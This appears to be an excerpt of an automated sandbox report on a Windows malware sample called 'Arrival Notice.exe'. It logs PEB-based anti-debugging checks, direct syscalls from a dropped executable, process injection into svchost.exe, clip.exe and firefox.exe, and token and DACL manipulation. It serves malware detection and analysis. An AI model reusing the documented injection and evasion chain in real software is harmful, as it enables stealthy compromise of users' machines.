            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEBD0 mov eax, dword ptr fs:[00000030h]1_2_038DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EBFC mov eax, dword ptr fs:[00000030h]1_2_0385EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BCBF0 mov eax, dword ptr fs:[00000030h]1_2_038BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904B00 mov eax, dword ptr fs:[00000030h]1_2_03904B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]1_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]1_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]1_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]1_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]1_2_038E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]1_2_038E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]1_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]1_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FAB40 mov eax, dword ptr fs:[00000030h]1_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D8B42 mov eax, dword ptr fs:[00000030h]1_2_038D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828B50 mov eax, dword ptr fs:[00000030h]1_2_03828B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEB50 mov eax, dword ptr fs:[00000030h]1_2_038DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382CB7E mov eax, dword ptr fs:[00000030h]1_2_0382CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904A80 mov eax, dword ptr fs:[00000030h]1_2_03904A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868A90 mov edx, dword ptr fs:[00000030h]1_2_03868A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]1_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]1_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886AA4 mov eax, dword ptr fs:[00000030h]1_2_03886AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830AD0 mov eax, dword ptr fs:[00000030h]1_2_03830AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]1_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]1_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]1_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]1_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BCA11 mov eax, dword ptr fs:[00000030h]1_2_038BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA24 mov eax, dword ptr fs:[00000030h]1_2_0386CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EA2E mov eax, dword ptr fs:[00000030h]1_2_0385EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]1_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]1_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]1_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038DEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03828918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03904940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0387096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03830887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038BC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0385E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039008C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038FA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03852835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_00410B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_003E2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_003D083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_003D09D5 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_003D0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe protection: read write
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exe | Thread register set: target process: 1700
            Source: C:\Windows\SysWOW64\clip.exe | Thread APC queued: target process: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2D6A008
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_00411201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_003F2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_0041B226 SendInput,keybd_event
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_004322DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Arrival Notice.exe"
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_00410B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_00411663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
            Source: Arrival Notice.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Arrival Notice.exe, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000000.1784010240.0000000001590000.00000002.00000001.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000002.4135802580.0000000001590000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000000.1784010240.0000000001590000.00000002.00000001.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000002.4135802580.0000000001590000.00000002.00000001.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4135923484.0000000001820000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000000.1784010240.0000000001590000.00000002.00000001.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000002.4135802580.0000000001590000.00000002.00000001.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4135923484.0000000001820000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000000.1784010240.0000000001590000.00000002.00000001.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000002.4135802580.0000000001590000.00000002.00000001.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4135923484.0000000001820000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_003D0698 cpuid
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_00428195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_0040D27A GetUserNameW
